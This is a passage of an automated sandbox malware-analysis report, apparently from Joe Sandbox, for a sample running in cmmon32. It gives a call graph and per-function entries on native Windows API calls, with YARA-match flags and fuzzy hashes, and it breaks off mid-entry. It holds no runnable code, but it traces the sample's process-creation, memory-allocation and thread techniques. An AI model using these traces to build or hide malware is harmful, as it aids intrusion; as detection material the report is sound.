32295->32244 32297 3ad07a 32296->32297 32305 3ad130 32296->32305 32298 3a9e70 LdrLoadDll 32297->32298 32299 3ad09c 32298->32299 32306 3b7da0 32299->32306 32301 3ad0de 32309 3b7de0 32301->32309 32304 3b82f0 2 API calls 32304->32305 32305->32251 32305->32252 32307 3b8dc0 LdrLoadDll 32306->32307 32308 3b7dbc 32307->32308 32308->32301 32310 3b8dc0 LdrLoadDll 32309->32310 32311 3b7dfc 32310->32311 32314 45b9fe0 LdrInitializeThunk 32311->32314 32312 3ad124 32312->32304 32314->32312 32316 3ab727 32315->32316 32324 3ad450 32316->32324 32320 3ab79b 32321 3ab7a2 32320->32321 32335 3b8100 LdrLoadDll 32320->32335 32321->32274 32323 3ab7b5 32323->32274 32325 3ad475 32324->32325 32336 3a7100 32325->32336 32327 3ad499 32328 3b3a30 8 API calls 32327->32328 32329 3ab76f 32327->32329 32331 3b9c80 2 API calls 32327->32331 32343 3ad290 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 32327->32343 32328->32327 32332 3b8540 32329->32332 32331->32327 32333 3b855f CreateProcessInternalW 32332->32333 32334 3b8dc0 LdrLoadDll 32332->32334 32333->32320 32334->32333 32335->32323 32337 3a71ff 32336->32337 32338 3a7115 32336->32338 32337->32327 32338->32337 32339 3b3a30 8 API calls 32338->32339 32340 3a7182 32339->32340 32341 3b9c80 2 API calls 32340->32341 32342 3a71a9 32340->32342 32341->32342 32342->32327 32343->32327 32345 3b3e30 LdrLoadDll 32344->32345 32346 3ad42f 32345->32346 32347 3ad43d 32346->32347 32348 3ad436 SetErrorMode 32346->32348 32347->32277 32348->32347 32351 3b33a6 32349->32351 32412 3ad1e0 32349->32412 32351->32279 32353 3b9c00 2 API calls 32352->32353 32356 3a7a25 32352->32356 32353->32356 32354 3a7c3a 32354->32282 32356->32354 32431 3b76e0 32356->32431 32358 3aabf9 32357->32358 32359 3aabff 32357->32359 32479 3acca0 32358->32479 32488 3a8600 32359->32488 32362 3aac0c 32363 3baf60 3 API calls 32362->32363 32406 3aae98 32362->32406 32364 3aac28 32363->32364 32365 3ad3b0 2 API calls 32364->32365 32366 3aac3c 32364->32366 32365->32366 32497 3b7b70 32366->32497 32369 3aad66 32513 3aab80 LdrLoadDll LdrInitializeThunk 32369->32513 32370 3b7d60 2 API calls 32371 3aacba 32370->32371 32371->32369 32376 3aacc6 32371->32376 32373 3aad85 32374 3aad8d 32373->32374 32514 3aaaf0 LdrLoadDll NtClose LdrInitializeThunk 32373->32514 32377 3b82f0 2 API calls 32374->32377 32375 3aad0f 32381 3b82f0 2 API calls 32375->32381 32376->32375 32379 3b7e70 2 API calls 32376->32379 32376->32406 32380 3aad97 32377->32380 32379->32375 32380->32289 32384 3aad2c 32381->32384 32382 3aadaf 32382->32374 32383 3aadb6 32382->32383 32386 3aadce 32383->32386 32515 3aaa70 LdrLoadDll LdrInitializeThunk 32383->32515 32500 3b7190 32384->32500 32516 3b7bf0 LdrLoadDll 32386->32516 32387 3aad43 32387->32406 32503 3a7260 32387->32503 32390 3aade2 32517 3aa8f0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32390->32517 32394 3aae06 32395 3aae53 32394->32395 32518 3b7c20 LdrLoadDll 32394->32518 32520 3b7c80 LdrLoadDll 32395->32520 32398 3aae61 32400 3b82f0 2 API calls 32398->32400 32399 3aae24 32399->32395 32519 3b7cb0 LdrLoadDll 32399->32519 32401 3aae6b 32400->32401 32403 3b82f0 2 API calls 32401->32403 32404 3aae75 32403->32404 32405 3a7260 3 API calls 32404->32405 32404->32406 32405->32406 32406->32289 32408 3ad3c3 32407->32408 32591 3b7cf0 32408->32591 32411->32289 32413 3ad1fd 32412->32413 32419 3b7e20 32413->32419 32416 3ad245 32416->32351 32420 3b8dc0 LdrLoadDll 32419->32420 32421 3b7e3c 32420->32421 32429 45b99a0 LdrInitializeThunk 32421->32429 32422 3ad23e 32422->32416 32424 3b7e70 32422->32424 32425 3b8dc0 LdrLoadDll 32424->32425 32426 3b7e8c 32425->32426 32430 45b9780 LdrInitializeThunk 32426->32430 32427 3ad26e 32427->32351 32429->32422 32430->32427 32432 3b9e50 2 API calls 32431->32432 32433 3b76f7 32432->32433 32452 3a8140 32433->32452 32435 3b7712 32436 3b7739 32435->32436 32437 3b7750 32435->32437 32438 3b9c80 2 API calls 32436->32438 32440 3b9c00 2 API calls 32437->32440 32439 3b7746 32438->32439 32439->32354 32441 3b778a 32440->32441 32442 3b9c00 2 API calls 32441->32442 32443 3b77a3 32442->32443 32449 3b7a44 32443->32449 32458 3b9c40 LdrLoadDll 32443->32458 32445 3b7a29 32446 3b7a30 32445->32446 32445->32449 32447 3b9c80 2 API calls 32446->32447 32448 3b7a3a 32447->32448 32448->32354 32450 3b9c80 2 API calls 32449->32450 32451 3b7a99 32450->32451 32451->32354 32453 3a8165 32452->32453 32454 3a9b20 LdrLoadDll 32453->32454 32455 3a8198 32454->32455 32457 3a81bd 32455->32457 32459 3ab320 32455->32459 32457->32435 32458->32445 32460 3ab34c 32459->32460 32461 3b8040 LdrLoadDll 32460->32461 32462 3ab365 32461->32462 32463 3ab36c 32462->32463 32470 3b8080 32462->32470 32463->32457 32467 3ab3a7 32468 3b82f0 2 API calls 32467->32468 32469 3ab3ca 32468->32469 32469->32457 32471 3b809c 32470->32471 32472 3b8dc0 LdrLoadDll 32470->32472 32478 45b9710 LdrInitializeThunk 32471->32478 32472->32471 32473 3ab38f 32473->32463 32475 3b8670 32473->32475 32476 3b8dc0 LdrLoadDll 32475->32476 32477 3b868f 32476->32477 32477->32467 32478->32473 32521 3abd90 32479->32521 32481 3accb7 32482 3accd0 32481->32482 32534 3a3d70 32481->32534 32483 3b9e50 2 API calls 32482->32483 32485 3accde 32483->32485 32485->32359 32486 3accca 32558 3b7010 32486->32558 32490 3a861b 32488->32490 32489 3a873b 32489->32362 32490->32489 32491 3ad060 3 API calls 32490->32491 32492 3a871c 32491->32492 32493 3a874a 32492->32493 32494 3a8731 32492->32494 32495 3b82f0 2 API calls 32492->32495 32493->32362 32590 3a5e80 LdrLoadDll 32494->32590 32495->32494 32498 3b8dc0 LdrLoadDll 32497->32498 32499 3aac90 32498->32499 32499->32369 32499->32370 32499->32406 32501 3ad3b0 2 API calls 32500->32501 32502 3b71c2 32501->32502 32502->32387 32504 3a7278 32503->32504 32505 3a9b20 LdrLoadDll 32504->32505 32506 3a7293 32505->32506 32507 3b3e30 LdrLoadDll 32506->32507 32508 3a72a3 32507->32508 32509 3a72ac PostThreadMessageW 32508->32509 32510 3a72dd 32508->32510 32509->32510 32511 3a72c0 32509->32511 32510->32289 32512 3a72ca PostThreadMessageW 32511->32512 32512->32510 32513->32373 32514->32382 32515->32386 32516->32390 32517->32394 32518->32399 32519->32395 32520->32398 32522 3abdc3 32521->32522 32563 3aa130 32522->32563 32524 3abdd5 32567 3aa2a0 32524->32567 32526 3abdf3 32527 3aa2a0 LdrLoadDll 32526->32527 32528 3abe09 32527->32528 32529 3ad1e0 3 API calls 32528->32529 32530 3abe2d 32529->32530 32531 3abe34 32530->32531 32532 3b9e90 2 API calls 32530->32532 32531->32481 32533 3abe44 32532->32533 32533->32481 32535 3a3d96 32534->32535 32536 3ab320 3 API calls 32535->32536 32538 3a3e61 32536->32538 32537 3a3e68 32537->32486 32538->32537 32570 3b9ed0 32538->32570 32540 3a3ec9 32541 3a9e70 LdrLoadDll 32540->32541 32542 3a3fd3 32541->32542 32543 3a9e70 LdrLoadDll 32542->32543 32544 3a3ff7 32543->32544 32574 3ab3e0 32544->32574 32548 3a4083 32549 3b9c00 2 API calls 32548->32549 32550 3a4110 32549->32550 32551 3b9c00 2 API calls 32550->32551 32553 3a412a 32551->32553 32552 3a4294 32552->32486 32553->32552 32554 3a9e70 LdrLoadDll 32553->32554 32555 3a416a 32554->32555 32556 3a9d40 LdrLoadDll 32555->32556 32557 3a420a 32556->32557 32557->32486 32559 3b3e30 LdrLoadDll 32558->32559 32560 3b7031 32559->32560 32561 3b7057 32560->32561 32562 3b7044 CreateThread 32560->32562 32561->32482 32562->32482 32564 3aa157 32563->32564 32565 3a9e70 LdrLoadDll 32564->32565 32566 3aa193 32565->32566 32566->32524 32568 3a9e70 LdrLoadDll 32567->32568 32569 3aa2b9 32568->32569 32569->32526 32571 3b9edd 32570->32571 32572 3b3e30 LdrLoadDll 32571->32572 32573 3b9ef0 32572->32573 32573->32540 32575 3ab405 32574->32575 32583 3b7ef0 32575->32583 32578 3b7f80 32579 3b8dc0 LdrLoadDll 32578->32579 32580 3b7f9c 32579->32580 32589 45b9650 LdrInitializeThunk 32580->32589 32581 3b7fbb 32581->32548 32584 3b8dc0 LdrLoadDll 32583->32584 32585 3b7f0c 32584->32585 32588 45b96d0 LdrInitializeThunk 32585->32588 32586 3a405c 32586->32548 32586->32578 32588->32586 32589->32581 32590->32489 32592 3b8dc0 LdrLoadDll 32591->32592 32593 3b7d0c 32592->32593 32596 45b9840 LdrInitializeThunk 32593->32596 32594 3ad3ee 32594->32289 32596->32594 32598 45b9540 LdrInitializeThunk 32601 3b6ee0 32602 3b9c00 2 API calls 32601->32602 32604 3b6f1b 32602->32604 32603 3b6ffc 32604->32603 32605 3a9b20 LdrLoadDll 32604->32605 32606 3b6f51 32605->32606 32607 3b3e30 LdrLoadDll 32606->32607 32608 3b6f6d 32607->32608 32608->32603 32609 3b6f80 Sleep 32608->32609 32612 3b6b10 LdrLoadDll 32608->32612 32613 3b6d10 LdrLoadDll 32608->32613 32609->32608 32612->32608 32613->32608

                                                                                                                Executed Functions

                                                                                                                Function 003B81BC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 347 3b81bc-3b8211 call 3b8dc0 NtCreateFile
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,003B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 003B820D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                • Opcode ID: f672b9a320071fdfa861b6def53c8a7a6699effb6be05b2c7c4a6da72eb2ef14
                                                                                                                • Instruction ID: baca6725ceebfa0f01d8cbd4281bba3e8f93ebb20e89415ae75e5fb48b46aea3
                                                                                                                • Opcode Fuzzy Hash: f672b9a320071fdfa861b6def53c8a7a6699effb6be05b2c7c4a6da72eb2ef14
                                                                                                                • Instruction Fuzzy Hash: 36F0B2B2215108AFDB08CF88DC95EEB37ADAF8C754F158648FA0D97241DA30E811CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B81C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 351 3b81c0-3b81d6 352 3b81dc-3b8211 NtCreateFile 351->352 353 3b81d7 call 3b8dc0 351->353 353->352
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,003B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 003B820D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                • Instruction ID: ea40f49f6dbd20b1fe683ed54b6751d9b978ca45af0bc44920fa6c35a4fca30b
                                                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                • Instruction Fuzzy Hash: 65F0B6B2200108ABCB08CF88DC85DEB77ADAF8C754F158648FA0D97241C630E811CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B82F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 357 3b82f0-3b8319 call 3b8dc0 NtClose
                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(0=;,?,?,003B3D30,00000000,FFFFFFFF), ref: 003B8315
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID: 0=;
                                                                                                                • API String ID: 3535843008-13212952
                                                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                • Instruction ID: 44e1a5eb1ab20090c7bb3cced2081d43abb984e7e32192d1618f1d06174b2735
                                                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                • Instruction Fuzzy Hash: 20D012752002146BD710EF98CC45ED7775CEF44750F154459BA185B242C930F90086E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B82EB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 360 3b82eb-3b8304 361 3b830c-3b8319 NtClose 360->361 362 3b8307 call 3b8dc0 360->362 362->361
                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(0=;,?,?,003B3D30,00000000,FFFFFFFF), ref: 003B8315
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID: 0=;
                                                                                                                • API String ID: 3535843008-13212952
                                                                                                                • Opcode ID: ca421b0c84a2ff3e447821fe86c2cb5ac84a654b401d82d8af0a0d04a1df588f
                                                                                                                • Instruction ID: e1ce13ffc53e1e76ca30e4e0f900a9df61a82d1b9944bcb01ab8e6a5da62a1f8
                                                                                                                • Opcode Fuzzy Hash: ca421b0c84a2ff3e447821fe86c2cb5ac84a654b401d82d8af0a0d04a1df588f
                                                                                                                • Instruction Fuzzy Hash: 2AD02B5D50D3C04FC711EBF468D60C27F40DE511187140ECFE49907543D534D1099392
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B8270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,003B3A11,?,?,?,?,003B3A11,FFFFFFFF,?,R=;,?,00000000), ref: 003B82B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                • Instruction ID: ed151fc90e8f7680c21db93363603c0c57a4b63af6fbad0887a2d225b4e987cb
                                                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                • Instruction Fuzzy Hash: 34F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E811CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B839B, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003A2D11,00002000,00003000,00000004), ref: 003B83D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: 5ce5c10e8e152209c28a0a877146405ff17887b3bdfab9ef05e8dcd4bf04d691
                                                                                                                • Instruction ID: 915649e8d34631cfa38ad890340ee7d5a5b5fb9bd66b6a640163bb8e5ff4b9e1
                                                                                                                • Opcode Fuzzy Hash: 5ce5c10e8e152209c28a0a877146405ff17887b3bdfab9ef05e8dcd4bf04d691
                                                                                                                • Instruction Fuzzy Hash: 1DF01CB6200218AFDB14DF99DC80EE777ADEF98754F118559FA1997241C630E911CBB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B83A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003A2D11,00002000,00003000,00000004), ref: 003B83D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                • Instruction ID: f4bbd8c97b3413dc503a9b315eb0e0d610045b9fafb215625573a8068016b914
                                                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                • Instruction Fuzzy Hash: 9EF015B2200208ABCB14DF89CC81EEB77ADAF88754F118549FE0897241CA30F810CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: c0f34281e1bb709f2667ca10b7e403f72bb3c151e568576a0bf2c49c76a93216
                                                                                                                • Instruction ID: 81e84a742d749fa25196d8af3621902e1eb083b777b068a27db05d31e77f6fb1
                                                                                                                • Opcode Fuzzy Hash: c0f34281e1bb709f2667ca10b7e403f72bb3c151e568576a0bf2c49c76a93216
                                                                                                                • Instruction Fuzzy Hash: 73900265251000072205A59907045070096A7D5395351C035F100A590CD661D8657161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7925f22987c59b79f5beb83b845af354a370f01dd628ae616c4afcdcb127bc79
                                                                                                                • Instruction ID: 002ffdd6380582a711f861f84afcdad7b38acb15848af019b56e187221d99d2d
                                                                                                                • Opcode Fuzzy Hash: 7925f22987c59b79f5beb83b845af354a370f01dd628ae616c4afcdcb127bc79
                                                                                                                • Instruction Fuzzy Hash: 939002A124200007620571994414616405AA7E0245B51C035E10095D0DC565D8957165
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 22a423d31eac3375c7b666d57770036050fa42e1739d50178ecb2813bec80658
                                                                                                                • Instruction ID: 7dfeb3f8a6284a50aadc4d272b6b1d23b9b50624e87661fb89c4c8606c7b2929
                                                                                                                • Opcode Fuzzy Hash: 22a423d31eac3375c7b666d57770036050fa42e1739d50178ecb2813bec80658
                                                                                                                • Instruction Fuzzy Hash: 2E90027124504846F24071994404A460065A7D0349F51C025A00596D4D9665DD59B6A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9a6f8c90799a59b660d498b3cc6e7408c45fe8ad4cd7bd88625c09d4ffed1791
                                                                                                                • Instruction ID: 5819abf1ac8acd57eb8f7acc1a17356c0d5f9e6c996837aea1a1133335603c4b
                                                                                                                • Opcode Fuzzy Hash: 9a6f8c90799a59b660d498b3cc6e7408c45fe8ad4cd7bd88625c09d4ffed1791
                                                                                                                • Instruction Fuzzy Hash: AD90027124100806F2807199440464A0055A7D1345F91C029A001A694DCA55DA5D77E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 5f2d1db72cddd664c6cd346c21d83f0b94f8156c90bc7f3a75f36048c7b6e92e
                                                                                                                • Instruction ID: b64bee95d55f2696326cba27156c1ee4ad748dc94ed9264661870ac033cbc19e
                                                                                                                • Opcode Fuzzy Hash: 5f2d1db72cddd664c6cd346c21d83f0b94f8156c90bc7f3a75f36048c7b6e92e
                                                                                                                • Instruction Fuzzy Hash: CA90027124100846F20061994404B460055A7E0345F51C02AA0119694D8655D8557561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 31718dc635ed0f4fd56509f525015eef95265a36728f9783c2e0ef4ffec781f7
                                                                                                                • Instruction ID: 1e9a834c76b2ebfe26a435a8262ca52eeca33845f086e54c72cf6263a7bf6934
                                                                                                                • Opcode Fuzzy Hash: 31718dc635ed0f4fd56509f525015eef95265a36728f9783c2e0ef4ffec781f7
                                                                                                                • Instruction Fuzzy Hash: 4B90027124108806F2106199840474A0055A7D0345F55C425A4419698D86D5D8957161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a28d6cbb130c2d7263263b4b4c833d70551138b2a1bcf29dab0544e61ee11b5d
                                                                                                                • Instruction ID: f2e595af8c505617cc095e5d39bef766ce82896f4bba42816b9ef8489f17c0c8
                                                                                                                • Opcode Fuzzy Hash: a28d6cbb130c2d7263263b4b4c833d70551138b2a1bcf29dab0544e61ee11b5d
                                                                                                                • Instruction Fuzzy Hash: 0F90027124100406F20065D954086460055A7E0345F51D025A5019595EC6A5D8957171
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
